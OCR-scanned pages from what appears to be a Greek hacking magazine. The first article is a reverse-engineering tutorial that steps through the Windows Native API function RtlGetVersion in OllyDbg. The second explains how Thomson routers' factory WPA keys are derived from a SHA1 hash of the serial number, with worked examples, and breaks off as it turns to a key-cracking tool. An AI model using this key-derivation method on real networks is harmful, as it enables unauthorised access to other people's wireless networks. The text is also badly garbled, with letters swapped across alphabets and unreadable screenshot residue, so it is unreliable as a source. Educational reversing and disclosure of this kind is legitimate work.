συστήνει στους προγραμματιστές (κι OX! ἄδικα) να χρησιµοποι- 
οὖν το Base API για λόγους συμβατότητας, WOTE να διασφα- 
λίζουν ὁτι τα προγράμματά τους θα τρέχουν о’ ὀλες TIG EKOO- 
σεις Kal service packs των Windows. Το Native API εἶναι αµέσως 
μετὰ ro Base και εἶναι το τελευταίο layer σε User Mode nou порі 
και κάνει ἆμεσες κλήσεις στον kernel των Windows. Πιο συγκεκριµένα, TO 
Native API βρίσκεται µέσα στο αρχείο c:\windows\system32\ntoskrnl.exe, 
το οποίο εἶναι о pure Windows kernel (μπορείτε тора va neite <oudou” ἡ 
"wow?» ἡ кат! παρόμοιο, τέλος πάντων). 


Σ’ αυτὀ το σημείο θα θέλαμε να σημειώσουμε ὁτι, KATA την ἄποψη του 
γράφοντα, η διαδικασία ελέγχου των συναρτήσεων στο Native API δεν 
εἶναι ιδιαίτερα απλἠ. Χωρίς την παραμικρἠ αμφιβολία θα πούμε бт! εἶναι 
δυσκολότερη κι апо aurr| rou Linux, αφού o κὠδικας των Windows εἶναι 
κλειστὸς KAI KATA συνέπεια TO source δεν διατίθεται στον καθέναν. Μόνο 
κὠδικας Assembly εἶναι δυνατὸν να ληφθεί KI αυτόςτις περισσότερες QO- 
pêç εἶναι εκτὸς kernel. Αν θέλουμε λοιπὸν να κάνουμε debugging τον ἴδιο 
TOV kernel, χρειαζόμαστε εξειδικευμένα προγράµµατα. Στο παρὀν άρθρο 
δεν θα κάνουμε debugging στον Windows Kernel αλλά θα δούμε noc, 
ακόµα κι ano User Mode, μπορούμε να μελετήσουμε γραμμήἠ-γραμμὴ Tov 
κώδικα σε -ακόμη κι undocumented- διαδικασίες και συναρτήσεις nou 
βρίσκονται εντὸς rou Native API ἡ αλλιώς μέσα στο αρχείο c:\windows\ 
system32\ntd11.d11. 


Θα εργαστούμε ὁπως περίπου εργάζονται oi high reversers όταν ψάχνουν 
για αδυναμἰες (vulnerabilities) σε διεργασἰες rou idiou του λειτουργικού 
συστήματος. Aoyikó εἶναι у’ αναρωτηθεἰτε yiari θα θέλαμε να κάνουμε 
κάτι τέτοιο. Χμ, OI λόγοι εἶναι γύρω στους 432, επειδἠ ὁμως πρέπει va 
κοιτάζουµε και την οικονομία χώρου, 8’ αναφέρουμε μόνο τους πρώτους 
τρείς ;) 
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Εἶναι ἑνα πολὺ кало, прото µάθηµα (όπως ἠδη εἰπαμε) για τους επἰδο- 
ξους reversers των Windows. 


i.  Μαθαΐνουμε пос να ελέγχουμε τα βασικἁ των εσωτερικών ÕI- 
εργασιών του λειτουργικού µας (how cool is that?) 


ii. Βλέπουμε апо прото XEPI να τρέχει κὠδικας των Windows 
που ανήκει στο -ολίγον cryptic- native API layer (pure 
awesomeness!) 


Αναρωτιέστε μήπως για TIG γνώσεις που απαιτούνται WOTE η συνέχεια va 
‘val κατανοητή; Μην ανησυχείτε, δεν εἶναι πολλὲς: 


a. Στοιχειώδεις γνώσεις τεχνικών reversing και χρήσης Tou Olly 
debugger. 


b. ‘Ooo кї av pavei παράδοξο μικρὴ (vai, µικρή) γνώση Assembly 
language. θα συναντήσουμε (μοιραία) поло κὠδικα Assembly, 
αλλά στο συγκεκριµένο ἀρθρο δεν θ΄’ αναλωθούμεσε Assembly 
listings µε επεξηγἠσεις. AAAWOTE AUTO που θέλουμε να κάνου- 
pe δεν απαιτεὶ ano κάποιον να ‘vai Assembly programmer. 


Na επαναλάβουµε οτι η ntdll.dll που υλοποιεί το Native API βρίσκεται 
μέσα στον κατάλογο c:\windows\system32. Кало εἶναι να την κάνουμε Eva 
copy/paste αλλού και να δουλέψουμε στη νέα θέση. H εργασία µας θα 
γίνει ano ἑνα box µε Windows 7 64bit Ultimate. 


Apxikd θα εξάγουµε απὸ τη DLL όλες τις functions nou χρησιμοποιεί και 
θα επιλέξουμε µια (στην τύχη;) για va τη μελετήσουμε. Па va εξάγουµε 
ὁλες TIG export functions апо ша DLL θα χρησιμοποιήσουμε то πρόγραμ- 
μα dumpbin, το οποίο npoopEperai апо τη Microsoft μαζί µε ro Visual 


Εικόνα 1 

Studio. Ano ¿va παράθυρο τερματικού πηγαίνουμε στον κατάλογο εργα- Όλες οι συναρ- 

σίας (στην nepinroor| µας εἶναι o D:\work2) τήσεις που Bpi- 

. σκονται μέσα στο 

C:\Users\thiseas> d & cd \work2 Native API Twv 

αντιγράφουµε την DLL EKEI Windows. 
D:\work2> copy с:\ r - — - 

š @ UltraEdit-32 - [DAwork2\exports:txt"] k === — s€ fete = | 
WindowsNsystem32Nntdll Е [di File Edit Search Project ‘View Format Column Macro Advanced Window Help ELTE 
dll. X| exports, Б" | ntdl.txt*| 

1 file(s) copied. + > D668/398/ 8/3] “| B| Φ| > DA| mee -|E B 3 B| Ma αἵ ЗЕ 
T icrasoFt (R) EOFF7PE Dum oe e — ج ج ج‎ 
ка! δίνουμε 2 Copyright (C) Microsoft сав All rights reserved. 3 
3 
D:Nork2» dumpbin — of file ntdll.dll 
6 
ntdll.dll /exports » gene Type: DLL 
exports txt 9 Section contains the following exports for ntdll.dll 
" | s 88888888 characteristics 
- 4В997759 time date stai Wed Mar 24 85:22:17 2018 
Me TNV τελευταῖα EVTO- |$ [pe "Low 
Añ δημιουργούμε το αρχείο ||} 2031 number of Functions 
exports.txt, το οποίο περιέ- || 1 о με 
: 18 ordinal hint RUA nane 
χει TIG export functions της ||: 
ῃ ' 26 18 8 0006Е797 A_SHAFinal 
ntdll.dll. Avoiyovtag то µε || 1 19 1 0006c849 ἢ SHAInit 
š j i ° E SN Кокус ionlistConcurrencyCount 
κάποιον editor θα δούµε κάτι || 22 ἡ 0998C580 AlpcrreeconpictionListessage = — 
που θα μοιάζει µετην εικόνα. ΙΙ B ¿mamapas 
| 27 25 7 88878CFR AlpcGetHeaderSize 
л . O | 26 8 88878C8F AlpcGetMessagefAttribute 
Ψάχνοντας λίγο TO αρχειο | 20 27 9 090RC6C9 RIpcGethessageFrontompletionList 
Й . 1 1 || 30 28 A GBGACICS AlpcGetOutstandingCompletionListMessageCount | 
αυτο, πεφτουµε πανω σε KOTI 31 29 В 00078CC6 ñlpcInitializeMessageñttribute 
JU П 32 30 С GGGACC25 AlpcMaxfllowedMessagelength 
πολὺ ενδιαφέρον: 33 31 D ΘΘΘΗΓΒ7Ο AlpcRegisterCompletionList 2 
стт" = a. — — - , 
Copythesaléction and put š on! Lo 940, Cob 40, CD DOS ο NOE J Bytes Sel: 13 INS 


Εικόνα 2. 


Ano εδὠ 


ξεκινάει n 
συνάρτηση 
RtIGetVersion 


тои Native АРТ. 
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Ordinal Hint RVA Name 
933 398 00903859A RtlGetVersion 


Βλέπουμε τη συνάρτηση RtIGetVersion, η οποία βρἰσκεται στην ΕΝΑ 
(Relative Virtual Address) 3859A. Το RVA εἰναι η σχετικἠ διεύθυνση όπου 
θα φορτωθεἰ η function RtlGetVersion όταν το αρχείο nou την περιέχει 
Φορτωθεί (κι αυτό) στη μνήμη κι αποκτήσει Base Address. Αν δηλαδἠ то 
ΕΝΑ µιας συνάρτησης εἶναι το 15 και το εκτελέσιμο φορτωθεὶ στην θέση 
100 (base address), τότε η συνάρτηση RtIGetVersion θα βρίσκεται στη 
θέση (διεύθυνση) 115. 


Ας δούμε τι ακριβώς κάνει αυτἠ η συνάρτηση. Па va το πετύχουμε ogei- 
AOUHE va κἄνουμε disassemble όλη τη ntdll.dll: 


D:\work2> dumpbin /disasm ntdll.dll > ntdlldisasm.txt 


To apxeio ntdlldisasm.txt nou δημιουργείται περιέχει *OÀov* Tov Assembly 
κὠδικα της DLL. Eiv' eva ASCII αρχείο μόλις... 17MB! Nac dpaye θα βρού- 
µε µέσα o’ αυτό το χάος ro σηµείο ὁπου καλείται n RtlGetVersion; Χμ, 
καθόλου δύσκολο. Αρκεἰ να εφαρμόσουμε τον τύπο 


@ UltraEdit-32 - ОЛАЛАР 


Td File Edit Search 


Project View Format Column Macro — Advanced Window Help 


li 


xj kernel01_post.txt | exports.txt ntdlldisasm.txt | headers. txt | 


je» 1SSA|S2a/aIS|m|m|G| à Зз | Dass 


7DEA8595: 
7DERS8596: 
7DER8597: 
7DER8598: 
7DERS8599: 
7DERS859RE 
7DEASSIC: 
7DEA859D: 
7DERS59F : 
7DERSSAG: 
7DEA85A6 : 
7DEASSA7: 
7DEASSAS: 
7DEASSAB: 
7DEASSAC: 
7DEASSAF: 
7DERS5B5: 
7DERS85B8: 
7DEASSBE: 
7DERS85C1: 


7DERS85C8 : 
7DERSSCB: 
7DEA85D1: 
7DEASSD4: 
7DEA85DA: 
7DEA85DC: 
7DEA85DE: 
7DERS85E2: 
7DEASSES: 
7DEASSEA: 
7DEASSEE: 
7DEASSF4: 
7DERS5F6: 


55 

8B 

51 

65 eax,dword ptr fs:[00000018h] 

53 ebx 

56 esi 

8B esi,dword ptr [ebp+8] 

57 edi 

8B edi,dword ptr [eax+36h] 

8B eax,dword ptr [edi+666666A4h] 
89 dword ptr [esi+4],eax 

8B Ü eax,dword ptr [edi+666666A8h] 
89 dword ptr [esi+8],eax 

OF eax,uord ptr [edi+990098ACh] 

88 

89 duord ptr [esi*BCh],eax 

8B 5 eax, dword ptr [edi+666666B6h] 
89 dword ptr [esi+16h],eax 

8B eax ,dword ptr [edi+000001F4h] 
85 eax,eax 

74 j 7DERS85ES 

66 word ptr [eax],8 

8F j 7DEFFEAS 


33 eax,eax 

66 word ptr [esi+14h],ax 

81 5 dword ptr [esi],11Ch 

75 j 7DEA8654 

66 ax,byte ptr [edi+666666AFh] 


] 


For Help, press FF Ln 70309, Col. 11, CO Mod: 15/1/2011 11:07:12uu Bytes Sel: 8 
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IMAGE_BASE_ADDRESS + Function_RVA = Function Address 


Το RVA το ἐχουμε. Εἶναι 0003859A. To IMAGE BASE ADDRESS της DLL 
ὁμως ποιο εἰναι; Па va το βρούμε δίνουμε: 


D:\work2> dumpbin /headers ntdll.dll | find "image base” 
7DE70000 image base (7DE70000 to 7DFEFFFF) 

Οπότε έχουµε 
7DE70000 + 0003859A = 7DEA859A 


και συνεπώς η συνάρτηση RtIGetVersion βρἰσκεται στη διεύθυνση 
7DEA859A (βλ. εικόνα 2). 


AUTO που θα κάνουμε тора εἶναι να εκτελέσουµε την παραπάνω ouvap- 
τηση μέσα апо τον Olly και να παρακολουθήσουμε та αποτελέσµατα. Пос 
όμως Oa καλέσουµε τη συγκεκριμένη function, η οποία μάλιστα βρίσκε- 
ται μέσα с’ Eva DLL; Με Tov Olly auto δεν εἶναι και τόσο δύσκολο! Πριν 
όμως ξεκινήσουμε τη μελέτη, ας δούµε прота av η RtlGetVersion εἶναι 
documented ano τη Microsoft. Πράγματι, εἶναι. H περιγραφἠ βρἰσκεται 
εδώ: 
http://bit.ly/rtlgetversiondoc 


An’ ὁπι διαβάζουμε η συνάρτηση αυτή δεν δέχεται input parameter κι 
όταν κληθεἰ επιστρέφει τ’ αποτελἐσματὰ της μέσα апо τη structure RTL - 
OSVERSIONINFOW. H structure αυτή ορίζεται £00: 


http://bit.ly/rtlosversioninfostruct 
Περιέχει Ta εξἠς βασικἀ στοιχεία του λειτουργικού: 
dwOSVersionInfoSize: To μέγεθος σε bytes της structure 


dwMajorVersion: Βασικός apiOuóc ἐκδοσης του λειτουργικού OUOTñ- 
ματος 


dwMinorVersion: H επέκταση του αριθμού ἐκδοσης του λειτουργικού 
συστήματος 


dwBuildNumber: To build number rou λειτουργικού 
dwPlatformId: H πλατφόρμα του λειτουργικού (32bit, 64bit) 
szCSDVersion: H ἐκδοση του εγκατεστηµένου Service Pack 


Ора!а μέχρι εδὠ. Μάθαμε TI περιμένουμε να πάρουμε ως αποτέλεσµα. Ас 
επανέλθουµε όμως στο πρόβλημα rou пос Oa єктєАёсоинє Tn function 
αυτή нє Tov Olly. Επειδἠ έχουμε να κάνουμε µε DLL κι OX! µε executable, 
θα κάνουµετο εξἠς: Αφού ανοἰξουµε rov Olly και φορτώσουμε τη DLL θα 
πάμε στη διεύθυνση ὁπου καλείται η RtIGetVersion function και θα την 
ορίσουμε ως Eva VEO σημείο εκκίνησης (origin point, βλ. εικόνα 3). 


Μ΄’ αυτὀν τον τρόπο, отау καλέσουμε την ntdll η λειτουργία θα ξεκινήσει 
ano To origin point που μόλις ορἰσαμε. Παρατηρεἰστε ότι η διεύθυνση της 
RtIGetVersion δεν εἶναι η ἴδια р’ αυτή nou ἐδωσε το output Tou hexdump. 
AUTO δεν εἶναι περἰεργο κι εξηγείται апо το γεγονὸς oT! η Base Image 
Address εἶναι διαφορετικἠ. 


Αφού λοιπὸν καθορίσουμε το VEO σηµείο εκκίνησης, βάζουμε κι Eva 
Break Point στη διεύθυνση 776D859A και εἶμαστε ἑτοιμοι να πατήσουμε 
RUN και μετὰ να συνεχίσουμε step by step (πατώντας το [F10]), napa- 
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ж OllyDbg - ntall.dil - [CPU - main thread, module ntdl 


[c] File View Debug Plugins ar Window Help 


ЕЕЕ ГАШЩЕЯ J ν|ε|μ|τ[ψ]η|ε]|κ|π|π|-15| SMP — — 


Backup 


51 
EDGE 19000000 PTR FS:(18) Copy » 


56 PUSI SI 5 
3875 08 PTR SS: СЕВР+82 Binary P. E 
52 PUSH EDI 


8878 30 PTR DS: CEAX+30] Assemble Space 
8887 R4909900 EAX, DWORD PTR DS: [EDI+R4] 


DS: [ESI441, EAX Label : 
8687 AS090000 PTR 05: [EDI+R8J 
MOV DWORD PTR OS: CESI+8],EAX 
ӧғв?в? βο000000 i D ΕΤΕ DS: CEDIA Comment : 
8887 BODODODO ORD PTR 05: [EDI+B0J i 
око | S E PIR ИБНЕ, ыда š 
85С@ TEST EAX, EAX Run trace › 
de S P TENES 
SNE ntdll.PPvEFERS t New origin here Ctrl- Gray * 
OR EAX, EAX 
:8946 14 MOU WORD | PTR DS: CEST+143, AX Goto > 
E 10910900 11 
БЕ 608654 c 
“бё: ΘΕΒ687 AF900l MOUZX AX, BYTE PTR DS:[CEDI+AF1 Follow in Dump › 
Εικόνα 3 κολουθώντας ETO! την εκτέλεση της συνάρτησης γραμμὴ προς γραμμὴ 
Ορισμὸς νέου κι ελέγχοντας ταυτόχρονα τις τιμὲς των καταχωρητὠν. Επἰσης, για va 
огїдїп роїпї για ελέγξουμε καλύτερα τ΄ αποτελέσµατα KAVOUHE KAI TO εξἠς κόλπο: Ano Tn 
NI γραμμή εντολἠς δίνουμε την εντολἠ winver, WoTE va δούμε (µε βάση το 
Π * sar 


documentation της MS) τι τιμὲς θα πάρουμε και NOU. Δείτε την εικὀνα 4 
για T' αποτελέσµατα Tou winver στο бїк© нас box. 


About Windows 


ДУ Windows / Ultimate 


εικονα Microsoft Windows 

To winver xpn- Е 

σιμοποιεἰ το Version 

Windows Native Copyright @ 2009 Microsoft Corporation. All rights reserved. 

API yia va єпї- The Windows 7 Ultimate operating system and its user interface are 
στρέψει т’ αποτε- protected by trademark and other pending or existing intellectual property 


Аёоната του... rights in the United States and other countries. 


This product is licensed under the Microsoft Software License 
Terms to: 


thiseas 
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Napatnpnote ro Version 6.1 (Build 7600). Εκτελὠντας Tn function πρέπει 
κι εμεἰς να πάρουμε ra... ανάλογα ;) Παρακάτω £xoupe κάνει µια ανάλυση 
TOU κὠδικα nou ἐδωσε о Olly, μαζί µε бка µας σχόλια για τις τιμὲς των 
καταχωρητώὠν που πήραμε σε KAGE γραμμὴ. Nouicoupe бт! εἶναι löaitepa 


διαφωτιστικἁ και δεν χρειάζονται πολλὲς ENEENYNOEIC. 


776D859A > MOV EDI,EDI E 

776D859C PUSH EBP ; Standard function prologue 

776D859D MOV EBP,ESP $ 

776D859F PUSH ECX 

776D85A0 MOV EAX,DWORD PTR FS: [18] ; return the TEB (Thread Entry Block) 
address 

776D85A6 PUSH EBX 

776D85A7 PUSH ESI 

776D85A8 MOV ESI,DWORD PTR SS:[EBP+8] ; return the PEB (Process Entry 
Block) address 

776D85AB PUSH EDI 

776D85AC MOV EDI,DWORD PTR DS:[EAX+30] 

776D85AF MOV EAX,DWORD PTR DS:[EDI+A4] ; eax-6 (MajorVersion) 

776D85B5 MOV DWORD PTR DS:[ESI+4],EAX 

776D85B8 MOV EAX,DWORD PTR DS: [EDI+A8] j eax=1 (MinorVersion) 

776D85BE MOV DWORD PTR DS:[ESI+8],EAX 

776D85C1 MOVZX EAX,WORD PTR DS:[EDI+AC] ;  eax-00001DBO i.e. 7600 (BuildNumber) 
MOV with zero eXtended 

776D85C8 MOV DWORD PTR DS:[ESI+C], EAX 

776D85CB MOV EAX,DWORD PTR DS:[EDI+B0] j eax=2 (platformID) 

776D85D1 MOV DWORD PTR DS:[ESI+10],EAX 

776D85D4 MOV EAX,DWORD PTR DS:[EDI+1F4] 

776D8658 POP EBX 

776D8659 LEAVE 

776D865A RETN 4 


Поло кала. Απ΄ ὁ,τι βλέπετε πήραμε αυτά τα... ανάλογα! Έχουμε va ка- 
VOUHE ακόµα µια µικρή παρατήρηση (όχι TINOT' ἄλλο, αλλά για να σας 
προετοιμάσουμε και για τα επόμενα ανάλογα άρθρα): Προσέξτε τη Oi- 
εὐθυνση 77608635. Εκεἰ καλεῖται µια function, η RtlGetNtProductType. 
Αυτἠ εἶναι μάλλον εσωτερικἠ και Undocumented. Πιο πολλά γι’ αυτὲς τις 
undocumented functions θα δούμε σε επόμενο άρθρο, paci µε τρόπους 
για TO пос κάνουμε debug τον kernel! 


Qc εδώ καταφέραμε та ακὀλουθα: 
1. Εἰδαμε ποιες functions υπάρχουν µέσα στη βιβλιοθήκη ntdll.dll 
2. Απομονώσαμε και διαβάσαµε µια an’ αυτές 


З. Την εκτελέσαµε γραμμὴ προς γραμμὴ και εἶδαμε τ’ αποτελέσµατα 


Εικόνα 5 
Κάνοντας 
debugging στο 
πρὀγραμµα 
μας... 


4 [m D 


3 Solution Ex... [54 Class View 
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Na πούμε yia ἄλλη ша фора oT! αυτή n function βρίσκεται µέσα στο 
Native API. Ano κει γίνονται OI κλήσεις κατ’ ευθείαν στον kernel των 
Windows. Πρόκειται για αρκετά επικἰνδυνα νερὰ, ónou αν κάτι δεν πάει 
καλά τότε στην καλύτερη περίπτωση το σύστημα θα κρεμάσει KAI ката 
паса πιθανότητα Eva pivi πυρηνικό μανητάρι Oa δημιουργηθεί πάνω ano 
την οθόνη σας. Εντάξει, πλάκα κάνουμε. Μάλλον το μανητάρι θα δημι- 
ουργηθεἰ μέσα στο KOUTI του υπολογιστή, εσεἰς όμως ката πάσα πιθα- 
νότητα δεν θα το δείτε κι επομένως θα εἶναι σαν να µην δημιουργήθηκε 
ποτέ. 


Επίσης, εἰδαμε μέχρι тора OTI οι συναρτήσεις που κοιτάμε αρχίζουν ano 
Rtl. (Τυχαίο; Δε νομίζω!) H Microsoft ἐχει επιλέξει EVA συγκεκριµένο 
name convention (ονοματολογία) για τις εσωτερικὲς συναρτήσεις της. To 
πρόθεμα (prefix) Rtl προέρχεται апо ro Run Time Library. Επίσης, μέσα 
στην ntdll θα δούμε και κάποιες ν΄’ αρχίζουν µε Zw. Συναρτήσεις р’ QUTO 
TO prefix κάνουν κλήσεις στον πυρήνα! (с.а. They're, like, OMG!) Γενικά, 
να ξέρετε ὁτι TO name convention που ακολουθείται εἶναι 
<Prefix><Operation><Object> 
Καλὰ μέχρι εδώ, µας λείπει όμως κάτι: Ένα прбүранна σε C++ που va 
καλεί κατευθείαν αυτή TN function Tou Native API και nou ἰσως (ποιός 
EEPEI;) να χρησιµοποιηθεί και σαν εφαλτήριο για μελλοντικούς ελέγχους 
ἄλλων, περισσότερο GYVWOTWV συναρτήσεων! Αν ψάξετε στο web η αλἠ- 
θεια εἶναι От! δεν θα βρεῖτε και πολλὲς πληροφορίες για то πὠς καλείται 
αυτἠ η συνάρτηση μέσα ano το Native API. Καλό εἶναι λοιπόν να υπάρχει 
ο κὠδικας σε C++ εδώ, στο deltaHacker, ὥστε να μπορέσετε να τον δώ- 
σετε και σε κανέναν ἄλλον ;) Το προγραμματάκι (σε visual C++ / Visual 
Studio 2010) εἶναι το ακὀλουθο: 


// Kerne101.cpp : Call the RtlGetVersion from native API 
// @ by Thiseas 2011 for p@wnbox.com 


// 
#include "stdafx.h" 


#include <Windows.h> 


15 p pwinapi = (pwinapi) GetProcAddress (GetModuleHandle (TEXT ("пса 
16 p pwinapi (&info); 
17 

© 18 return (0); 


Watch1 
| Name | Value | Type 
? info (dwOSVersionInfoSize -0 dwMajorVersion=6 dwMinorVersion=1...} _OSVERSIONINFOW 
@ dwOSVersionInfoSize 0 unsigned long 
9 dwMajorVersion Щщ unsigned long 
@ dwMinorVersion unsigned long 
$ dwBuildNumber | 7600. unsigned long 
@ dwPlatformId 2 unsigned long 
% szCSDVersion 0x0046fe20 '* Q, + wehar_t [128] 
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typedef void (WINAPI *pwinapi)(PRTL OSVERSIONINFOW); 
int _tmain(int argc,  TCHAR* argv[]) 
{ 

RTL_OSVERSIONINFOW info; 

pwinapi p_pwinapi; 

ZeroMemory(&info, sizeof(RTL_OSVERSIONINFOW) ) ; 


p pwinapi = (pwinapi) GetProcAddress(GetModuleHandle(TEXT("n 
tdll.dll")), "RtlGetVersion"); 


p pwinapi(&info); 
return(0); 


} 


Δοκιμάζοντας µε Tov debugger rou Visual Studio το παραπάνω прбүран- 
μα, βλέπουμε Ori φτάνοντας στην τελευταία γραμμὴ naipvouje τ’ αναµε- 
νόμενα αποτελέσµατα (βλ. εικόνα 5). 


Ара το προγραμματάκι µας μᾶλλον λειτουργεἰ σωστά! Ως συνήθως, pno- 
ρεἰτε να κάνετε το παραπάνω πρὀγραμμα ὁ,τι θέλετε. Νομίζουμε бт! δεν 
χρειάζεται va ξοδέψουµε ἄλλα bytes για να ro σχολιάσουµε - δοκιμάστε 
TO και μόνοι σας |) 


Κάντε debug ἡ ακόµη και disassemble το πρὀγραμμα κι επαναλάβετε тп 
διαδικασία που περιγράψαμε с’ auró το άρθρο. Μάλιστα σας προτείνουμε 
να δοκιμάσετε και κάποιες ἄλλες συναρτήσεις, OXI και τόσο απλὲς και 
npo@aveic 000 aurr| nou δοκιμάσαμε εμείς. Σας υποσχόμαστε οτι δεν θα 
χάσετε. 


Happy reversing and see you real soon! 
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Oa ετε πιθανώς προσέξει бт! αρκετά ασύρματα ADSL router εἰν’ €p- 
yootaoiakd puðpiopėva WOTE va χρησιμοποιούν κἀποιο συγκεκριµένο 
κλειδἰ για την πρόσβαση κατά WPA. Πρόκειται oiyoupa yia µια βελτίωση 
σε σχέση µε O,TI συνέβαινε παλαιότερα -KAI σε μερικὲς περιπτώσεις OU- 
νεχίζει να συμβαίνει ακόµη και σήμερα-, ὁπου εξ ορισμού επιτρεπόταν η 
ελεύθερη πρόσβαση στο WiFi χωρίς κανενὸς εἰδους προστασία. Θέλοντας 
λοιπὸν oi κατασκευαστὲς να βρουν µια λύση που θα παρέχει µια κἄποια 
ασφάλεια στους αμύητους χρήστες, ρυθμίζουν πλέον αρκετὲς συσκευές 
ώστε µε TO που ενεργοποιείται To WiFi у’ απαιτείται η εισαγωγἠ κλει- 
ioù για την πρὀσβαση rov ασύρματων clients. Πα να κάνουν μάλιστα 
τα πράγματα λἰγο ευκολότερα, οι κατασκευαστὲς TUNMVOUV στο κάτω 
μέρος Tou router To username kai To password για την πρόσβαση στο 
web interface της συσκευἠς, το επιλεγμένο SSID καθὼς και το noAunó- 
θητο κλειδί. 


Τώρα, боо! ασχολούνται -ἐστω και για λίγο καιρὀ- µε την ασφάλεια ou- 
στημάτων, αμέσως βλέπουν αρκετά προβλήματα о’ αυτή την πρακτικἠ. Με 
σχετικἀ аплёс̧ TEXVIKEG κοινωνικὴς μηχανικἠς, ακὀµα και HE µια αδιάφορη 
βόλτα κοντὰ στο χώρο ὁπου βρίσκεται ο ασύρματος router, η απόκτηση 
του κλειδιού πρόσβασης εἶναι σχεδὸν τετριμμένη υπόθεση. Νομίζουμε бт! 
AVAAUTIKOTEPEG / λεπτομερέστερες περιγραφὲς δεν χρειάζονται. 


Εκτὸς ὁμως anó τους προαναφερθέντες τρόπους απὀκτησης rou κλει- 
διού, ο ἰδιος ο αλγόριθμος που τους παράγει 
εἶναι πράγματι δυνατὸν ν΄’ ανακαλυφθεί. 


Ὅπως µπορείτε να διαπιστώσετε µε λίγη 
αναζήτηση στο web, αρκετοἰ μεγάλοι 
ελληνικοί ISPs (Internet Service 
Providers) ἐχουν Ta εγχειρἰδια των 
συσκευών που δίνουν στους πελά- 

τες τους Online, διαθέσιµα σε κἆθε 
ενδιαφερόμενο. Μέσα σ’ αυτά τα 
manual. περιγράφονται αναλυτι- 

ка οι τρόποι χρήσης και ρύθμισης 

+ TOV router, ενὼ περιέχονται KI 
αναλυτικὲς οδηγἰες yia την επίτευξη 
ασύρματων συνδέσεων. Τέσσερις Baolkoi ISP 
που εξετάσαµε αναφέρονται σε μοντέλα του ἴδιου 
κατασκευαστἠ (Thomson). Ας σημειωθεί εδὠ Оті 

εντ. c παρόμοιες μεθόδους «κλειδώματος» των 

er nou προορἰζονται για To ευρύ καταναλω- 

~ TIKÓ κοινό εφαρμόζουν KI ἀλλοι κατασκευα- 
OTÉG. Ακριβὼς γι’ αυτό το λόγο ορισμένοι 

.@ attackers -πριν καν ξεκινήσουν τις επι- 
`. θἐσεις- κοιτάζουν TÜ SSID κι αν δουν бт! 
παραπέμπει σε γνωδτὀ ISP /. WiFi router 
αρχίζουν πρῶτα τη συλλογἠ πληροφοριών 
για την ἴδια τη συσκευή. Εξαιρετικἁ χρήσιμες πληρο- 
@opiec εμπεριέχονται στά συνοδευτικἀ προγράμματα σύν- 
δεσης και ρύθμισης των router. Ένας ικανός attacker 6a κατεβάσει 

то проүраџџа апо το site Tou ISP και µε χρήση debugger θα επιχειρήσει 
να βρει τον αλγόριθμο παραγωγής κλειδιὼν που χρησιμοποιεί ο KaTa- 
σκευαστἠς του router. Εξαιρετικἀ χρήσιμος γι’ auTO το εγχείρημα εἶναι 
о 000 το δυνατὸν μεγαλύτερος ὄγκος ano πληροφορίες για 55105, MAC 
addresses, WPA keys kat serial numbers. Па τις ανάγκες της δικἠς µας 


Reverse WiFi Cracker 
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διερεύνισης, пёра ano τα στοιχεία που µας ἔδωσαν οικειοθελώς YVWOTOI 
και φίλοι, συλλέξαμε αρκετά KAI апо τους δικτυακούς τόπους γνωστών 
ελληνικών ISP. Ιδού δύο παραδείγματα: 


SSID: Thomson5B8B69 

WPA: EFF014E813 

S/N: СРӨ845МТЕ7Р(86) 

SSID: ThomsonB98F 3A 

WPA: 04F71764C2 

S/N: CP0829SFAAQ(46) 
Ανάλυση 


Με τα δεδοµένα λοιπὸν nou συλλέξαμε και μετὰ and την ανάλυση της 
κωδικοποίησης του Thomson ὁπως περιγράφεται στην ιστοσελἰδα 


www.gnucitizen.org/blog/default-key-algorithm-in-thomson-and-bt- 
home-hub-routers 


TOU hacking group GNUCITIZEN, εἶναι πράγματι εφικτή η δηµιουργία 
evoc key generator. Πιο συγκεκριµένα, To WEP/WPA key ota Thomson 
δημιουργείται ano та 10 прота bytes Tou SHA1 hash ενὸς string που 
προέρχεται апо ro serial number της συσκευἠς. 


Αναλυτικότερα, τα δύο прота byte rou serial number (CP) εἶναι κοινά O’ 
όλα ra Thomson (CP9845NTF7P(86) και CP0829SF4AQ(46)). Ta δύο επόμενα 
bytes αφορούν στο ¿TOG napayoyr|c. Στο парабеүна µας εἰναι 08, yia To 
2008: CP@845NTF7P(86) και CP@829SF4AQ(46). Ta δύο επόμενα byte αναφὲ- 
ρονται στην εβδομάδα παραγωγἠς: CPOs4SNTF7P(86) και CP@829SF4AQ(46). 
Ta δύο επόμενα (NT και SF) εἶναι αδιάφορα και δεν λαμβάνονται υπόψη. 
Ομοίως και τα δύο τελευταία (EVTÖG των παρενθέσεων), τα οποία xpnoipo- 
ποιούνται για TOV ἐλεγχο checksum ката την εισαγωγἠ Tou serial number 
στο συνοδευτικὀ npóypaupa εγκατάστασης rou router. Τέλος, OI τρεις 
χαρακτήρες πριν την παρένθεση (CPO845NTF7P(86) και CP0829SF4AQ(46)) 
αποτελούν τον αὐξοντα αριθµό της συσκευἠς. Τα τρία αυτά bytes εἶναι 
σηµαντικἀ yia την παραγωγἠ του κλειδιού και το συνοδευτικὀ npoóypap- 
μα εγκατάστασης паіру τους δεκαεξαδικοὺς ASCII codes καθενὸς εξ 
αυτών. 


Δοκιμές 


Με βάση τα προηγούμενα, το string που προκύπτει απὀ το serial number 
CP@845NTF7P εἶναι To CP0845463750. Εφαρμόζοντας τον SHA1 πάνω του 
παίρνουμε To hash 


efe014e813|93966e95404f5b53ce82450b | 5b8b69 
Ta δέκα прота bytes αυτού rou SHA1 hash, δηλαδή ro πρὀθεµα 
efe014e813 


εἶναι To εργοστασιακὀ WPA key. Τα δε ἐξι τελευταία bytes, δηλαδἠ ro 
επίθεμα 


5b8b69 
εἶναι επἰθεμα Tou προκαθορισµένου SSID (Thomson5B8B69). 


Επαναλαμβάνοντας τη бїабкаоїа για To serial number CP0829SF4AQ naip- 
VOUJE TO string CP0829344151 KI ETO! ἔχουμε 
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sha1(CP0829344151) = 
04f71764c25e4da518f31741fec51480dab98f3a 


T ‚То προκαθορισμένο WPA key εἶναι To 
φαν νο δη KE F 04f71764c2 


ὟΝ οἱ шр , 2 καὶ ro επίθεμα rou προκαθορισµένου SSID 


Aud eA e le Ы εἶναι το 
е» N ° 


yh OS rens E b98f3a 
: AE ` ` (ολόκληρο το προκαθορισμένο SSID εἰναι 
» А L ThomsonB98F3A). 


ЫР e* `x ` b y Me βάση. την προηγούμενη ανάλυση και 
- ñ fet 4 ` TIG δοκιμές, δεν εἶναι δύσκολο va γραφτεὶ 
. ⁄ ἑνας reverse cracker o οποίος θα παίρνει το 
